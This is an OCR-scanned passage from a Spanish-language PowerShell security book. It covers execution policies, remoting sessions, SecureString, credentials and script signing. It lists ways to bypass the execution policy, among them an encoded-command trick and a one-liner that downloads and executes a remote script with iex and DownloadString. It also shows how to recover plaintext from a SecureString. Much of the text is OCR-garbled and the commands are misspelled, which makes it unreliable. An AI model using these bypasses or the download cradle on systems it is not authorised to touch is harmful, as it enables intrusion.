puedan ser ejecutados por cualquier usuario. Existen ciertos métodos que permiten controlar los 
permisos sobre los ficheros, incluso métodos o funciones que fortifican y aseguran las cadenas de 
texto. En ciertas ocasiones estas medidas no son suficientes si no existe una configuración correcta 
del entorno. Las debilidades y errores de configuración de los sistemas pueden provocar errores 
importantes, que pueden acabar en una elevación del privilegio o una ejecución de código arbitrario 
sobre un sistema. 


¿Abrir los sistemas al scripting o realizar las mismas tareas todos los días manualmente? El script 
puede automatizar la realización de las tareas, pero es algo con lo que se debe tener cuidado. Al igual 
que ocurre con el desarrollo del software, hay que probar los scripts en un entorno de no producción, 
ya que un fallo puede acabar en una catástrofe para la organización. A priori, sin la lectura de su 
código, un usuario no dispone de información sobre si el script puede ser dañino para el sistema o el 
entorno. PowerShell aporta conceptos, como los mencionados anteriormente, para evitar los riesgos 
comentados. 
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Políticas de ejecución de PowerShell 

La línea de comandos PowerShell dispone de un mecanismo que impide que un seript se ejecute en 
el equipo. Este mecanismo es la política de ejecución. Como se ha mencionado anteriormente, esta 
política de ejecución dispone de diferentes opciones y configuraciones. En un entorno laboral se 
puede utilizar este mecanismo para asegurar que aplicaciones maliciosas no pueden ejecutar código 
en el equipo para tomar ventaja en un entorno concreto. 


En el ámbito del pentesting también puede ser un obstáculo, pero existen diversas maneras para 
realizar un bypass de la política de ejecución. Algunas vías para realizar este bypass son triviales, 
pero efectivas. Hay que recordar que por defecto la política configurada en los equipos es restricted, 
es decir ningún script podrá ser ejecutado a través de la línea de comandos. 


Microsoft proporciona la política restricted con el objetivo de que los administradores tengan que 
modificar la política o realizar acciones concretas, las cuales se podrán ver en este capítulo, con el 
fin de tener conciencia de lo que se está haciendo en todo momento. ¿Por qué realizar un bypass? La 
necesidad de automatización por parte de un usuario es una de las respuestas más comunes o lógicas 


que pueden darse. 


Por otro lado, si se observa desde el punto de vista del atacante, se puede suponer un escenario 
dónde éste tiene acceso físico a un equipo y tenga la necesidad de ejecutar órdenes desde la linea de 
comandos. La línea de comandos ha llegado a ser muy popular en los últimos años en el mundo del 
pentesting, ya que se puede lograr realizar infinitud de acciones en los sistemas Microsofi. 


En la versión 2 de PowerShell existen 2 políticas extra, como son bypass y undefined. La primera es 
similar a unrestricted, no bloquea ninguno, ni muestra mensaje de advertencia. La segunda indica 
que si ningún ámbito dispone de una política de ejecución, es decir, todas son undefined, se aplicará 
la política por defecto, restricted. 


Para consultar la política de ejecución actual se dispone del emdler Ger-Executionpolicy. Para 
cambiar la política de ejecución se dispone del cm«dlet Set-Executionpolicy «política a cambiar>. 


Ambitos 

El usuario debe entender los ámbitos de PowerShell, al menos tener una idea de lo que son y cómo 
actüan. Éstos aportan cierta riqueza a la línea de comandos y las acciones que se realizan en ella. 
Además, proporcionan distinción a las políticas de ejecución. 


En la primera versión de PowerShell existía únicamente el ámbito de Local Machine, sin embargo 
con la aparición en 2009 de la versión 2 aparecieron otros ámbitos que se detallan a continuación: 


- Process: La política de ejecución afecta al proceso en curso, es decir a la sesión de 
PowerShell. Este ámbito no es persistente. 


- CurrentUser: La política de ejecución afecta al usuario actual. Se almacena en el registro 
de Windows en la parte correspondiente al usuario, por lo que es persistente. 
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- LocalMachine: La política de ejecución afecta a todos los usuarios de la máquina. Se 
almacena de manera persistente en la parte del registro HKEY LOCAL MACHINE. 


La aplicación de las políticas de ejecución tiene una prioridad. Esta prioridad va en el orden en 
el que se enunciaron éstas en el párrafo anterior. En otras palabras, la más prioritaria es process, 
seguida de currentuser y localmachine. Cuando la política process es declarada en undefined, se 
aplica la política currentuser. Cuando ésta también se declara como undefined, entonces se aplica 
la de /ocalmachine. Por último, si todos los ámbitos son undefined, se aplica la más restrictiva por 
defecto, es decir, restricted. 


El emdlet Get-ExecutionPolicy junto al parámetro — list permite obtener las políticas de ejecución 
aplicadas a los distintos ámbitos. Para configurar una política a cualquier ámbito se debe utilizar el 
parámetro —scope e indicar el ámbito de trabajo. 


Bypass a la política de ejecución de PowerShell 


Hay diferentes maneras para llevar a cabo un hypass de la política de ejecución de PowerShell. A 
continuación se enumeran diferentes posibilidades: 


l. La primera y más sencilla de todas es la de copiar y pegar el contenido de un script en la 
consola interactiva. De esta manera tan sencilla, y teniendo acceso físico al equipo se podrán 
ejecutar las distintas instrucciones que componen el script que no se puede ejecutar. 


2. Utilización del comando echo para escribir el contenido del script en la PowerShell y se pasa 
el contenido a través de un pipe a la aplicación PowerShell. Un ejemplo sencillo de esto sería 
echo write-host “mi bypass" | PowerShell —noprofile - . Otra opción es utilizar el comando car 
o Get-Content con el fin de leer de un fichero el script y pasarle las instrucciones a través de un 
pipe. Por ejemplo, Get-Content script.ps! | PowerShell.exe —noprofile -. 


3. Se puede utilizar el argumento —command cuando se lance el binario PowerShell en la línea 
de comandos. Como ejemplo se muestra el siguiente: PowerShell -command "write-host “esto 
es un bypass '" 


4. Se puede utilizar el comando /nvoke-Command. Como ejemplo se muestra el siguiente: 
Invoke-Command —Scriptblock fwrite-host 'esto es un bypass ']. 


5. Encodear el contenido del script y ejecutarlo con el argumento —EncodedCommand. En 
primer lugar hay que almacenar el contenido encodeado en una variable, por ejemplo $contenido 
= "write-host “mi bypass '"; Sbytes = [System.Text.Encoding]:: Unicode. GetBytes($contenido); 
Sencoded = [Convert]::ToBase64String(Sbytes). Una vez que se tiene el texto encodeado se 
invoca de la siguiente manera PowerShell.exe -EncodedCommand Sencoded. 


6. Se puede utilizar el flag ExecutionPolicy. La sintaxis para ejecutar la instrucción sería la 
siguiente PowerShell —ExecutionPolicy Bypass —File <script>. Se puede utilizar el argumento — 
ExecutionPolicy para indicar la política que se quiere utilizar, siendo Bypass una política especial 
para este tipo de casos. 
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7. Descargar el contenido del script y ejecutarlo invocando a PowerShell. El ejemplo de esta 
vía sería PowerShell -noprofile -c "iex(New-Object Net. WebClient).DownloadString( direcció 
nURL)". 


Como se puede ver algunas de los bypass son obvios, pero muy efectivos cuando el pentester tiene 
una política que le bloquea. Disponer de acceso local permite que el usuario pueda utilizar cualquiera 
de estos métodos para conseguir saltarse una política que le restrinja. Si el acceso es remoto, se 
pueden utilizar algunas como por ejemplo la séptima opción para descargarse el contenido a ejecutar 
y cargarlo con PowerShell. 


La ejecución remota y cómo comunicarse 


Administrar sistemas requiere el poder consultar y ejecutar tareas sobre máquinas y recursos 
con ubicaciones remotas dentro del entorno empresarial. La línea de comandos de PowerShell 
proporciona la posibilidad de llevar a cabo esta gestión gracias a .NET Framework. En algunas 
ocasiones se puede requerir arrancar una sesión remota por lo que es necesario disponer de Windows 
Remote Management 2.0, que por defecto viene instalado en la máquina con Windows 7/2008 R2. 


El requisito para poder aprovecharse de la ejecución remota en cualquier máquina del dominio es 
tener el acceso apropiado, es decir, ser miembro del grupo administradores de la máquina remota 
o ser un administrador del dominio. PowerShell lleva a cabo la operativa de autenticación con las 
máquinas remotas, por lo que es imprescindible lo comentado anteriormente sobre ser miembro de 
un grupo local administrativo o del dominio. 


En este punto se puede autenticar dos usuarios con el mismo nombre y misma contraseña en 
máquinas remotas, por ejemplo el administrador local de la máquina A tiene la misma contraseña 
que el administrador local de la máquina B. Esto sería lo que se denomina Pass the hash implícito, 
pero existe una opción para poder indicar con qué contraseña o credenciales se quiere loguear en el 
sistema remoto. 


Creación y configuración de una sesión remota 

Existen gran cantidad de cmdlets en PowerShell que permiten ejecutar instrucciones remotas. 
Por ejemplo para listar los servicios de una máquina remota sin necesidad de Windows Remote 
Management 2.0 se puede utilizar el parámetro computername como se mencionó anteriormente, 
Get-Service -ComputerName <nombremaquina> -Name EFS. 


Las sesiones remotas pueden ser creadas tras habilitar Windows Remote Management. Para llevar a 
cabo esta acción puede utilizarse el cmdlet Enable-PSRemoting. Para deshabilitar la gestión remota 
se puede utilizar el cmdlet Disable-PSRemoting. La conexión de red debe estar en un perfil de 
dominio o privado, nunca püblico. 


Otro error muy común es que el host al que el usuario quiera conectarse no sea de confianza, 
obteniendo un error como el de la imagen. 
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IPS C:\Windous\systeng32> New-PSSezzion -ComputerName bit-pc -Credential $cred 
[bit-pcl Error de conexión al servidor remoto. Mensaje de error: El cliente HinRM no puede procesar la solicitud. 
lema de autenticación ez into de Kerberos el equipo lente no está unido a un dominio. 
z i cmd para configura 
Para obtener 
sulte el tema de la Ayud 


orte HITPS o agregar el equipo de destino al valor de config ón TrustedHosts 
tedHosts. Tenga en cuenta que es posible que no se autentiquen los equipos de la a 


infornación, ejecute el guiente comando: winre help config. Para obtener m infornac 
about Ren roubleshooting. 
* CategoryInfo * OpenError: XSysten-Managene. ...RenoteRunspace:RenoteRunspace) [1], PSRenotingIransportExc 
eption 
+ FulluQualifiedErrorid : PSS: ionOpenFailed 


Fig. 1.08: Error sobre equipo remoto de no confianza 


Para solucionar esto se deben añadir al archivo de equipos de confianza los equipos remotos que se 
quieran administrar. Para ello se ejecuta la siguiente instrucción: 


PS CiNWindousisysten32> Set-Iten MSMan:*SlocalhostNClientNIrustedHozts -Value bit-pc 


figuración de uridad WinRM. 
a la lista T Hosts para el cliente WinRM. Los equipos de la 1 a TrustedHosts podrían no 
. El cliente podría envi: infornación de credenciales a tos equipos. ¿E seguro de que de nodificar 


[N] No [U] Suspender J] Ayuda Cel valor predeterminado es S“): s 
C:\Windous\systen32> Neu- on -ConputerNane bit-pc -Credential $cred 


Id Nanc D er State ConfigurationNane 


Availability 


Opened Microsoft.PoverShell Available 


Fig. 1.09: Corrección del error de equipos de confianza. 
ES qui L 


Como curiosidad indicar que el valor que se asigna es el nombre de las máquinas las cuales se toman 
como de confianza, un valor es posible es (*), pero no es aconsejable su uso ya que se tomarían 
todos los nombres de máquina posible como de confianza. Este último aporte sería negativo para la 
seguridad empresarial. 


Una vez se dispone del entorno preparado para crear las sesiones remotas, para esta función se 
dispone del cmdlet New-PSSession. Este cmdlet dispone de bastantes opciones interesantes, los 
cuales se pueden revisar en la siguiente tabla: 


Parámetro 


Credential Se especifica con que usuario y credenciales se quiere iniciar la sesión 
Indica el puerto al que se conectará PowerShell, por defecto es puerto 80 


ComputerName 


Crea una conexión con la máquina que se especifica, la sesión es persistente 


Utiliza el protocolo SSL para establecer la conexión, por defecto, no se usa 


UseSSL SSL 


Tabla 1.03: Parámetros importantes para la creación de sesiones 
4 J 


Para crear la sesión como el usuario con el que se está logueado en el sistema local hay que ejecutar 

New-PSSession —ComputerName «nombre máquina. En cualquier instante, puede ser necesario 

que el usuario disponga de una sesión con otro usuario conocido en la máquina remota. Por esta razón, 

se debe ejecutar la siguiente instrucción $cred = get-credential; new-PSSession ComputerName 

«nombre máquina> -Credential $cred. Esta instrucción solicita las credenciales, a través del emdlet 

Get-Credential, y después crea la sesión indicando las credenciales almacenadas con el parámetro 
Credential. 


o ..J[[.[.[.]2——-. . A 3o ^ ow 3? | 


Capítulo I. Conceptos básicos de PowerShell 


IPS C:NVindousssystem325 $cred = Get-Credential 


mdlet Get-Credential en la posición 1 de la canalización de conandos 
Proporcione valores para los parámetros siguientes: 


dential 
S C: NindousNcysten32? $cred 


System.Security.Secur 
bit-pcwablo 


PS C:NMindouz*Nsusten325 Neu-PSSession -ComputerNane bit-pc -Credential $cred 
Y Availability 


ComputerNane State ConfigurationNane 


bit-pc Available 


pS C:NMindouzNsustem3225 m 
Fig. 1.10: Creación de sesión remota con otras credenciales. 


Si se quiere visualizar qué sesiones están disponibles se puede utilizar el emalet Get-PSSession. Este 
emdlet devuelve las distintas sesiones que pueden haber creadas, ya sean locales o remotas. 


Las ejecuciones remotas 
Cuando se ha creado una sesión puede resultar interesante entender cómo se puede ejecutar 


-e ` > tener clar ' nara er llevar a cabo 
instrucciones remotas. En primer lugar se tiene que tener claro que para poder llevar a cabc 


ejecución de estas instrucciones éstas deben ser especificadas como si de un script se tratase. El 
¿millet que llevará a cabo la ejecución de una instrucción remota es Invoke-Command. Este emdler 
proporciona al usuario 2 parámetros como son —Session y —ScriptBlock. El primer parámetro indica 


qué sesión se utilizará, mientras que el segundo indica las instrucciones que se ejecutarán en remoti 


Para simplificar este concepto un pequeño ejemplo, si se quiere ejecutar instrucciones en remoto 
través de una sesión se puede ejecutar /nvoke-Command -Session «Objeto Session? -ScriptBloci 

instrucción 1; instrucción 2; : instrucción N}. Como se mencionó anteriormente para visualiza 
las distintas sesiones que puede haber y su estado se dispone de Ger-PSSession, Para obtener una 
sesión y almacenarla en una variable se puede utilizar la siguiente sentencia Ssesion = Ger-PSSesioi 
id — X^. Siendo X un entero que identifica la sesión. 


S C:NUindowsNsustem32» Get-PSSession 


Conf igurationName fivailability 


mputerName State 


ocalhost Opened Microsoft .PowerShell Available 
ren Bea kon Microsoft.PowerShell None 
Session3 bit-pc Broken Microsoft.PowerShell None 
Session4 bit-pc Broken Microsoft .PowerShell None 
Session5 bit-pc Broken Microsoft .PowerShe11l None 
Session6 bit-pc Broken Microsoft .PowerShe11 , None 
Session? bit-pc Opened Microsoft .PoverShell Available 


Sessioni 
Session2 


PS C:NMindousNsustem32» $sesion = Get-PSSession -id ? , 
PS C:NUindousNs us tend25 Invoke-Comnand -Session $sesion -ScriptBlock (pud? 


Path PSCo eN 


#Wsers\bit\Documents 


Fig. 1.11: Elección de la sesión y ejecución de una instrucción remota. 


Para llevar a cabo la ejecución de varias instrucciones dentro del bloque, como se ha indicado 
anteriormente, se utiliza el carácter *;'. Más adelante se verá como ejecutar un script de forma 
remota, sin tener que pegar el contenido entre las llaves. 


EH = J| 


Utilidades remotas 


Las ejecuciones y sesiones remotas abren un abanico de posibilidades en la administración de 
sistemas dentro de un entorno empresarial. En este apartado se presentan 2 utilidades esenciales 
en la administración, la posibilidad de ejecutar scripts en remoto y la posibilidad de lanzar una 
PowerShell en remoto. 
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Para: llevar a cabo la ejecución de un script a través de una sesión se utiliza el cmdlet Invoke- 
Command junto al parámetro —FilePath. Con este parámetro se indica al comando dónde debe 
buscar el script que se lanzará en remoto. El parámetro ScriptBlock y FilePath son incompatibles, 
por lo que no se puede ejecutar /nvoke-Command con ambos en la misma sentencia de la línea 
de comandos. La ejecución quedaría de la siguiente manera /nvoke-Command —Session «objeto 
session? -FilePath «Ruta del script». 

ion $sesion -FilePath 'C:*Mlserzs*spracticasc*unidades.psi' 


Used (GB> Root 


CurrentLocation PSC 


124,99 49.20 C:N -..itwNDocuments 
18,54 20,85 


bit-pc 

IE F:N bit-pc 
Function bit-pc 
KCU HKEY CURRENT. .lSER bit-pc 
HKEY LOCAL MACHINE bit-pc 

bit-pc 

bit-pc 

ZN bit-pc 


Fig. 1.12: Ejecución de un script remoto. 


En la salida de los scripts remotos se da cierta información que quizá el usuario no quiera que se 
muestre como el equipo sobre el que se está ejecutando el script. Para este caso se dispone del 
parámetro ZideComputerName, con el que la ejecución no mostrará en que equipo se llevó a cabo 
el proceso. 


El proceso de lanzar una PowerShell en la máquina remota puede ayudar bastante al administrador, 
pentester o usuario que lo requiera en un momento dado. Esto puede ser necesario cuando un 
usuario necesite manejar una shell interactiva sobre un equipo remoto para lograr ejecutar acciones 
concretas, las cuales no se encuentren automatizadas por alguna razón. 


Para abrir una sesión de PowerShell en una máquina remota se puede utilizar el cmdler Enter- 
PSSession. Con este emdlet solo hay que indicar cuál es la máquina sobre la que se quiere lograr el 
control de la siguiente forma Enter-PSSession -ComputerName «Nombre de la máquina. Si se 
quiere acceder con otras credenciales que no sean las mismas con las que el usuario está logueado 
en la máquina local hay que utilizar el parámetro Credential. Un posible ejemplo sería el siguiente 
Scred = Get-Credential; Enter-PSSession -ComputerCame «Nombre máquina? -Credential $cred. 


stem32> $cred = Get-Credential; Enter-PSSession —ComputerName bit-pc -Credential $cred 


mdlet Get-Credential en la posición 1 de la canalización de comandos 


roporcione valores para los paránetros siguientes 
jredential 
S$ C:NUsers*Nbit*Documents? hostnane 


Fig. 1.13: Lanzar una PowerShell en remoto. 


ES 
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Fortificar la información en la línea de comandos 


En los equipos de trabajo se pueden almacenar datos sensibles los cuales siempre deberían estar 
protegidos de forma segura. La memoria RAM es una de esas zonas en las que por su volatilidad, 
en muchas ocasiones, se piensa que es menos peligroso que la información no esté tan protegida. De 
este modo se puede caer en un error importante, ya que seguramente la RAM almacena importancia 
critica como contraseñas, identidades, trozos de ficheros sensibles, etcétera, 


Esta afirmación es una premisa en el ámbito de la seguridad de la información. PowerShell se basa 
en NET Framework para la securización de las cadenas de texto. 


Hay que distinguir entre cadena cifrada y cadena segura. En este apartado se estudia las características 
y la manera de gestionar las cadenas seguras. Las propiedades de las cadenas seguras son las que se 
pueden visualizar a continuación. 


A las cadenas de texto sólo se le puede añadir texto carácter a carácter. 
Acceso controlado E: z C" 
Si se intenta agregar más de un carácter, se producirá un error 


Contenido cifrado Es el framework el encargado de cifrar carácter por carácter 


Las cadenas seguras o SecureString no se duplican en memoria, Están 


fuera del alcance del recolector de basura de PowerShell, ya que éste 
podría duplicar dicha información 


No duplicación 


Tabla 1.04: Propiedades de las cadenas seguras en PowerShell. 


Creación de una cadena segura 
En algunas ocasiones es necesario proteger la información que es adquirida por PowerShell, por 
ejemplo cuando un script recoge un valor sensible que es requerido al usuario. El emdlet Read-Host 
dispone de un parámetro para proteger mediante la transformación de la cadena de entrada en una 
cadena segura la información. Ese parámetro es AsSecureString. 

C:NUsersNbit 03/02/2612 00:23:13 > $sec = Read-Host —AsSecureString 


M i EET 


/INUsersNbit 83/02/2012 00:23:34 > $sec 
.Security.SecureStrin 


C:NUsersNbit 03/02/2012 80:23:37 > E 


Fig. 1.14: Creación de una cadena segura obtenida por teclado. 
$ / 


Al introducir el texto se protege con asteriscos el texto sensible. El objeto no puede leerse de forma 
directa, ya que la cadena se encuentra protegida. Hay otra manera de crear cadenas seguras, pero 
lleva explícitamente la cadena de texto en plano, por lo que no se recomienda su uso en el desarrollo 
de scripts. El comando ConvertTo-SecureString permite la creación de la cadena segura a raíz de 
una cadena de texto plano. 
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ENS ./—. 


Para ejemplificar esto se muestra la siguiente instrucción ConvertTo-SecureString ‘prueba’ — 
AsPlainText —Force. Los parámetros, de tipo switch, AsPlainText y Force son imprescindibles 
para crear la cadena segura. Los objetos SecureString disponen de métodos para tratar a éstos. A 
continuación se pueden estudiar distintos métodos interesantes: 


AppendChar Anexa un carácter a la cadena segura Ssec.AppendChar('x') 


Com Copia el objeto que contiene la 
AU 
P cadena segura 


$sec2 = S$sec.Copy() 


Libera todos los recursos que utiliza 


el objeto $sec.Dispose() 


Dispose 


El contenido se hace constante. No 
puede ser modificado 


MakeReadOnly Ssec. MakeReadOnlv() 


$sec. 


Inserta, eliminan o modifican un 
carácter en la posición indicada 


InsertAt / 
RemoveAt / SetAt 


InsertAt(«posición?, «carácter? ) 


Ssec.RemoveAt( «posición? ) 


Tabla 1.05: Métodos de los objeros SecureString. 


Existe una curiosidad y es que si se crean 2 cadenas seguras que albergan el mismo texto, un atacante 
malicioso podría intentar realizar fuerza bruta sobre ellas. En PowerShell el mismo texto cuando £ 
es pasado a cadena segura no es el mismo objeto, por lo que si se aplicase el método equals sobre 
ambos objetos el valor devuelto sería false. Microsoft consigue evitar los ataques de fuerza bruta 
sobre las cadenas seguras, evitando este tipo de ataque característico y consiguiendo obtener mayor 
seguridad en el tratamiento de la información. 


Convertlo-SecureString 'prueba' -—AsPlainText -Force 


PS Cillsersxbit 83/02/2812 08:51:36 
PS CivUsersvbit 83/02/2012 08:55:13 
System.Security.SecureString 


IPS C:NUsers*bit 83/02/2012 80:55:16 = ConvertTo-SecureString 'prueba' -fisPlainIext Force 
IPS CiUisersxbit 03/02/2012 88:55:28 
IBustem.Security.SecureString 


g 
§ CiNUsersxbit 03/02/2012 80:55:31 .Equals($sec25 


alse 
PS C:NUsersMbit 03/82/2012 08:55:37 


Fig. 1.15: 2 Cadenas seguras con el mismo texto son distintas. 


Leyendo las cadenas seguras 


Para la lectura de cadenas seguras se puede utilizar un método dónde el recolector de basura de 
PowerShell no puede intervenir. Se copia el valor de la cadena segura a una zona de memoria dónde 
el recolector de basura no tiene acceso. Si el recolector tuviera acceso en esa zona de memoria, se 
podría copiar el valor a otra zona dónde un atacante pudiera acceder. La técnica SecureStringToBSTR 
es la que asignará el valor de la cadena segura a una zona de memoria dónde el recolector de basura 
no puede acceder. Con esta técnica se obtiene un puntero a la zona de memoria no gestionada por e 
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recolector. Después con Prr7oStringUni se duplicará el contenido de la cadena pero ya en plano. Hay 
que utilizar rápidamente el valor que se ha recuperado y eliminar el puntero a la zona de memoria 
no gestionada por el recolector, y la modificación de la cadena en claro cuando ya no se necesite. 


PS C:Misers bit 03/02/2012 01:26:01 sec = Read-Host -fisSecureString 

312 Bi: 14 $ptr - 
Nsersbit 2012 01:26:24 
NUsersNbit 83/02/2012 81:26:49 


E [System.Runtime.InteropServic 
$claro = [System.Runtime.InteropServic 
> $claro 


rshall::SecureStringToBS 
Harshall::PtrToStringUni4 


NUsersNbit 83/02/2012 81:26:52 


llLiberanos ptr 
Userssbit 83/02/2012 81:27:08 


[Systen.Runtine.InteropServices.Marshall::ZeroFreeCoTaskHMenUnicode 


Fig. 1.16: Recuperación de una clave segura a plano, 


Las credenciales tratadas por PowerShell 

Las credenciales son unas de las herramientas de autenticación y autorización más importantes y más 
sensibles. Por esta razón este tipo de información debe estar siempre protegida y nunca almacenarse 
sin protección, ya sea en memoria o disco. Es decir, se debe evitar el almacenamiento en texto 
plano o codificación fácilmente reverseable. Anteriormente se ha mencionado que con las cadenas 
seguras se tiene al alcance de la mano la posibilidad de enmascarar credenciales con el comando 
Read-Host. Otro emdlet que proporciona seguridad en el momento de la captura de credenciales es 
Get-Credential. 


El emdler Get-Credential recoge la información sobre el usuario, en lo que a contraseña y usuario 
se refiere, a través de un pequeño cuadro de diálogo que sale en la interfaz gráfica. 1 na vez se 
introducen los datos de la credencial se crea un nuevo objeto de tipo PSCredential. El atributo 
usuario es de tipo String, mientras que el atributo de la contraseña es de tipo SecureString. 


S C:NUsersNbit 03/02/2012 04:13:36 > $cred = Get-Credential 
ondlet Get-Credential en la posición 1 de la canalización de comandos 


'roporcione valores para los parámetros siguientes: 
;medential 


Propordone sus credendales. 


Usuario: 


€ pablo 
Contraseña: e... 


| Aceptar || Cancelar | 


Fig. 1.17: Captura de credenciales con Get-Credential. 


El emdlet Ger-C. 
-s e t- Credenti, tene Š E e 
denn : ja Credential tiene un uso amplio en PowerShell para poder realizar tareas bajo otra 
d. Los expe T : : dH MA 
"^s expertos en seguridad recomiendan no utilizar cuentas de administrador en las 
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sesiones de trabajo, solamente ejecutar las acciones que requieran dichos privilegios. Get-Credential 
proporciona el cambio de identidad para la realización de acciones concretas. Como ejemplo se 
propone un entorno en el que el usuario que se encuentra trabajando con una sesión, ya sea local o 
remota, de PowerShell necesita copiar unos documentos sobre los que no dispone de privilegios. El 
usuario podría ejecutar el comando Get-Credential para recoger las credenciales del usuario que sí 
tiene acceso y utilizarlas a través del parámetro —Credential del comando Copy-Item. En resumen, 
el usuario podría ejecutar la siguiente instrucción Copy-/tem «archivo origen? «archivo destino» 
-Credential $(Get-Credential). 


Scripts firmados digitalmente 

Cuando se comentó el apartado de las políticas de ejecución se mostraban directivas con las que se 
puede evitar el uso de scripts y los distintos ámbitos de ejecución. Uno de los casos recomendables es 
firmar digitalmente los scripts corporativos con el fin de tener un control total sobre las ejecuciones 
de scripts, permitiendo sólo los que están firmados. En otras palabras, de esta forma se sabe quién 
es el desarrollador del scripr. Existen 2 políticas que pueden trabajar con la firma de scripts: 
remotesigned y allsigned. 

La firma digital puede demostrar la autenticidad e integridad de un mensaje o documento digital. 
Entonces, el usuario que ejecute el script firmado tendrá la certeza de quién lo creó y de que éste no 
ha sido modificado en la transmisión u obtención del script. 


¿Qué es un certificado digital? ¿Para qué se necesita en el firmado de scripts? Un certificado digital 
es un documento con el cual un tercero, una CA o autoridad certificadora, garantiza la identidad de un 
sujeto, que puede ser el firmante de un script entre otras cosas, y una clave pública. La clave pública 
que va asociada al certificado sirve para verificar que la firma del seript es correcta y pertenece a 
la clave privada con la que fue firmado. Gracias a la confianza que se da a la CA se puede deducir 
que la clave pública asociada en el certificado pertenece a quién se indica en éste y no a otro sujeto. 


Se propone el siguiente escenario, la empresa A dispone de un certificado emitido por una CA, o 
incluso podría autofirmarlo y colocarse en posición de CA, aunque esto no es lo más recomendado. 
Una vez que se dispone de este rol, se puede emitir certificados que se utilizan para la firma de scripts 
en la línea de comandos de PowerShell. Estos certificados llevan asociados una clave privada, la 
cual se utiliza para realizar la firma del script. Una vez que en el entorno empresarial se envíen los 
scripts a otras máquinas, éstas deben disponer del certificado emitido por la CA, por lo que se habrán 
importado o distribuido esos certificados. 


Los requisitos 
El mayor de los requisitos para llevar a cabo la operativa es disponer de Microsoft Windows SDK. 
Este SDK dispone de una gran cantidad de herramientas, pero la que interesa en este caso para la 
creación de certificados es makecert. Se debe tener en cuenta que para poder trabajar con makecerl 
hay que ejecutar una cmd o una PowerShell como administrador. Una vez instalado, el usuario pue 
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ejecutar la siguiente secuencia Inicio -> Todos los programas -> Microsoft Windows SDK v 7.0 
CMD Shell. Sobre CMD Shell, botón derecho ejecutar como administrador. 


Para obtener Microsoft Windows SDK se puede descargar desde la siguiente dirección web Atp 
uwwunicrosoft.com/download/en/details.aspx?displaylang—-en&id-—3 138 i 


E” Windows® SDK for Windows® 7 and .NET Framew: 


» Windows® SDK Setup Wizard á 7 Software i 
Development Kit 


Welcome to the Setup Wizard. 


You can now install the Microsoft? windows$ 
Software Development Kit for Windows 7 and .NET 
Framework 3.5 Service Pack 1. 


The SDK contains documentation, samples and tools 
designed to help you develop software for the 
Windows platform. 


m Windows* 
13 y Software 


Development Kit 


Next > || Cancel | 


Fig. 1.18: Microsoft Windows SDK v7.0. 


Certificados 


l na vez el usuario tiene Microsoft Windows SDK instalado en el equipo se puede crear el prime: 
certificado digital. Se convierte el equipo dónde se emite en CA. Para ello se ejecuta sobre la cuj de 
Microsoft Windows SDK la instrucción que puede visualizarse en la imagen 


Administrador: Microsoft Windows Server 2008 DEBUG Build Environment - makecert -a shal -n ... l ct [X 
Setting SDK environment relative to C:\Program Files\Microsoft SDKs*MindowsNu?7.HB| 


Targeting Windows Server 2088 x86 DEBUG 


Mindous EVE RENA RARE CORE 
r: lease either specify the outputGertificateFile or -ss option 


MakeCer sic! P i ; ifi 
Baz]. repe [ basiciextended options] [outputCertificateFilel 


k <keyName> 


Er 
|] 


TI 


Subject's key container name; i 
s ne; To be created if res 
ie generated private key as exportable hid ci 
ubject's certificate store nar s "es p 
coek icats ame that stores the output 
AAEE AS certificate store location. 
urrentUseriLocalMachine> Def E to 'C 

ES achi - sfault to 'CurrentUser"* 
EB Number from 1 to 2311. Default to be unique i 

e signing authoritu of the certificate 
a A CORRECTA 

ertificate subject X500 name Ceg: CN-Fre 

- h an : re 2113 

Return a list of basic options s ed Peur? 
Return a list of extended options 


u 
window poystem32makecent -a s -n 
Root -sr LocalMachine 


<store> 
<location> 


«number? 
«authority» 


«35809nane» 


"CN-root Powers) wc» o =8 ` ` 
eku 1-3.6-1.5.5.2.3-3 ca ELM co 


Fig. 1.19: Creación de la entidad certificadora de confianza. 
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Una vez creado este certificado el equipo se ha convertido en una CA, se puede visualizar en el 
almacén de certificados, con MMC, en la carpeta Entidades de certificación raíz de confianza como 
se ha creado. A continuación ya se puede emitir certificados para la firma de código. Para lograr este 
objetivo se ejecuta la instrucción de la imagen. 


Administrador: Microsoft Windows Server 2008 DEBUG Build Environment 


:\Windows\system32> 
iC: NIindowsNsustem32» 
:\WWindo system32> 
C:\Windo ystem32> 
C:\Windo ystem32> 
i system32> 
system32> 
sisystem32> 
CiWlindowsNsystem32> 
CinlindowsNs ystem32> 
CivHindowsNs ystem32> 
CivlindowsiAsystem32> 
CiMHindowsNsystem32> 
ICiMHindowsNsystem32 > 
:NWMindow stem32> 
CivlHindowsNsystem32> 
CiWindowsNsystem32> 
CiWMbindowsNsystem32> 
CiMbindowsNsystem32> 
Cilindowssystem32> 
CinllindowsNsystem32»makecert -n '"CN=PowerShell i64" -a shal — 
6.1.5.5.7.3.3 —iv root.puk -ic root.cer 
Succeeded 


-eku 1.3. 


C:NWMindousNsustem32»5.. 


Fig. 1.20: Emisión del certificado con propósito de firma de código. 


A continuación se detalla los significados de los parámetros que se han utilizado para la creación de 


Descripción 


Indica el algoritmo de la firma (md5S/sha!) 


Indica el nombre del certificado 


Indica que el certificado será autofirmado 


los certificados. 


Parámetro 


Indica cual es la clave privada asociada a un certificado 


Indica el nombre del almacén (MY-personal/Root-CA) 


Indica en qué zona del registro se registra el almacén del certificado 


Inserta identificadores. En este caso se está indicando el propósito del 
certificado con este código 


Indica el archivo de la clave privada 


Incluye la clave privada en el certificado 


Indica el archivo del certificado 


Tabla 1.06: Parámetros del comando makecert. 


E i 
a" 
$$ 
-SI" 
KU 
Y 
-pe 
-iC 
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Por ültimo recalcar que el certificado emitido por la CA, en este caso la máquina propia del usuario, 
hay que distribuirlo a las máquinas que ejecutar los scripts firmados. De este modo ya se dispone de 
la base y los certificados necesarios para la firma y verificación de scripts. 


Firma tu script 

Para firmar el script simplemente hay que obtener el certificado con propósito de firma de código y 
almacenarlo en una variable. Una vez realizada esta acción, con el cmdlet Set-AuthenticodeSignature, 
se aplicará la firma al script. 


Hola bit-PCNpablo bienvenido a PowerShell 
> (:MUserswbit 03/62/2012 13:45:85 > $cert = 1s -Path rt:NCur tüUser*My -CodeSigningCert 
ss Cimlserssbit 83/62/2012 13:45:36 > Set-RuthenticodeSignature 5proce s.psí Certificate $cert 


Directorio: C:MUsers*bit 


Fig. 1.21: Firma del script. 
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Capítulo II 
Scripting en PowerShell 


1. Interactuando con la shell 


En este apartado se estudia conceptos básicos de la interacción con PowerShell. Además, se puede 
conocer como personalizar el entorno para una mejor experiencia de usuario en el uso diario de la 
